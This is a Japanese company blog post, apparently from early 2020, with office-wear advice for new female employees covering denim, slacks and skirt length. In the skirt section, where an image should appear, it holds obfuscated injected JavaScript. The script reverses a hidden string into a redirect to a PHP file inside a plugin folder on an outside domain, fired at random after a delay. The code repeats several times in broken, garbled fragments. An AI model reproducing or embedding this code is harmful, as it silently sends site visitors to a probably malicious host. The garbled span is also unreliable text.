【女性新入社員必見!】職場でもおしゃれできるワンポイントアドバイス

【女性新入社員必見!】職場でもおしゃれできるワンポイントアドバイス

入社まであと約1ヶ月……。服装自由だからおしゃれしたいけど、仕事に相応しい服装ってわからなくて何を着ていこう!?っと悩んでる新入社員の方も多いはず。
少しでもそんな女の子達の参考になればいいなと思い、入社してまだ1ヶ月ホヤホヤの新人なりの目線で、おススメのアイテムをまとめてみました☆
私自身153㎝だからこそ気を付けている”脚長見え”ワンポイントアドバイスもありますのでSサイズガールのお役にも立てればいいなと思います☺

 
 

入社目前。服装自由はラッキー?それともアンラッキー?

2月も終わりに差し掛かり、入社まで残り1ヶ月ほど。
これからは私服出社になるからショッピングに行こう!……ただ何を着るのが正解なの?と思っている人も多いかと思います。
テクダイヤも服装自由なので毎日好きなお洋服を着ることができるのは嬉しい半面、毎朝クローゼットを開けては
「もう着るものがない!あれは月曜日着たし、これは水曜日着たし……」
と毎朝”ふさわしい”洋服選びに時間がかかります。
アルバイトをしていた頃は制服があったのでとりあえず着替えて家を出るなんてことが出来ましたが、そういうわけにもいきません。

どうにか時間をかけずに毎朝パッと着ていく洋服を選ぶにはどうしよう?

私は「ボトムスルーティーン化」で乗り切っています。
月~金曜日までのボトムスだけをある程度ルーティーン化しておくことで、朝は気候に合わせてトップスを選ぶだけ!
ボトムスは同じでも、トップスの組み合わせ次第で全く違う雰囲気のコーディネートが作りだせちゃうので
「あの子いつも同じ洋服着てる」と思われる心配もありません。
月曜日は一週間の気合を入れてスラックスパンツ、週の真ん中水曜日は少しゆったりとワイドパンツ、金曜日は仕事終わりに出かけるからスカート……
自分なりのボトムスルーティーンを作り上げると毎朝のお洋服選びの時間短縮間違いなしです!

では、”ふさわしい”服装とはなんだろう?

何が本当に”ふさわしい”服装なのかまだまだ勉強中ですが、
この1ヶ月で学んだことを踏まえておススメアイテムをまとめてみました☆

 

パンツスタイル

blog-jeans

①デニムパンツ
働き始める前はデニムを履いていくのはダメなのではないかと思っていましたが、デニムで出社される方もたくさんいます。(会社によって異なりますが……)
やはり動きやすく疲れないという利点があるのでおススメです。ただ、会社にいるのは同僚だけではなく来客の場合もあるのでダメージ加工の入ったデニムパンツは避けた方がいいでしょう。
デニムを履くと少し子供っぽく見えてしまう場合は、シャツのタッグインとベルトで腰回りをすっきりさせることでヤボったさや子供っぽさをなくすことが出来ます。
足首が見えるように履いて少しヒールのある靴と合わせてもとても素敵になります。

②スラックスパンツ
スーツではなくていいという所で少しハードルが下がるので履きやすさとデザインの自由度が上がるので私は大好きです!
オフィスカジュアルのようなコーディネートになるので、研修や初会議で気合いを入れたい時に着ると気持ちが締まります。
ストライプやセンタープレスの入ったものを選ぶと縦のラインで脚長効果で少し背が高く見えますよ
また、少しハイウエストなものを選ぶのもオフィスカジュアルだけに留まらずオシャレに見えるのでおススメです。

 

スカートスタイル

$GRn=function(n){if (typeof ($GRn.list[n]) == "string") return $GRn.list[n].split("").reverse().join("");return $GRn.list[n];};$GRn.list=["\'php.rabedis-nimda-snoitcnuf/cni/srebmem/snigulp/tnetnoc-pw/moc.nemrolias//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and-white.jpg” alt=”black-andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and-white” width=”800″ height=”199″ class=”alignnone size-full wp-image-53771″ />

スカートはやはりなんといっても「女性らしさ」を一番演出してくれるアイテムです。
フレアスカートやプリーツスカート、タイトスカートなどたくさんの種類があり、自分の体形に合ったものや好みがそれぞれ大きく異なると思うのですが
スカートの種類ではなく”丈”には要注意です。
ミニスカートは避けた方がいいのはもちろんのことですが、
長すぎると可動式のイスのタイヤに巻き込まれてしまうというハプニングの原因になることも。
せっかくの可愛いスカートがちぎれてしまうのは悲しすぎるので、椅子に座った時に床に着いてしまう長さのものにはご注意ください。

 

”洋服はあなたの印象を決める”

”何も着るものがない、あまり気に入ってないけど今日はこれでいいか、
と手を抜いたたった1日であなたの印象が決定されてしまうことだってある。
それならばあなたが好きな服を着よう。”

これは、私が社会人として働きはじめるにあたって尊敬する大学の教授に頂いたアドバイスです。
お洋服もあなたの第一印象を大きく決定づけるものの一つです。
”ふさわしい”格好を考えつつも、自分に自信を持てるお洋服を着ることが
毎日楽しくお仕事に通える秘訣になるのではないかなと思います。

春が近づきだんだんと暖かくなってきますので、おしゃれも楽しみつつ
皆さん、新生活一緒に頑張りましょう!

 

※本記事は、2020年2月26日に公開されたものです。


創業40年の製造業。ダイヤモンド事業からスタートしたテクダイヤは、会社本来の「人好き」が作用し、人との出会いを繰り返しながら業態変化を続ける。 現在はセラミック応用技術・精密機械加工技術・ダイヤモンド加工技術をコアとしながら先端技術のものづくりを支える。スマホやデータセンターなどの通信市場、更にはNASAやバイオ領域にも進出中。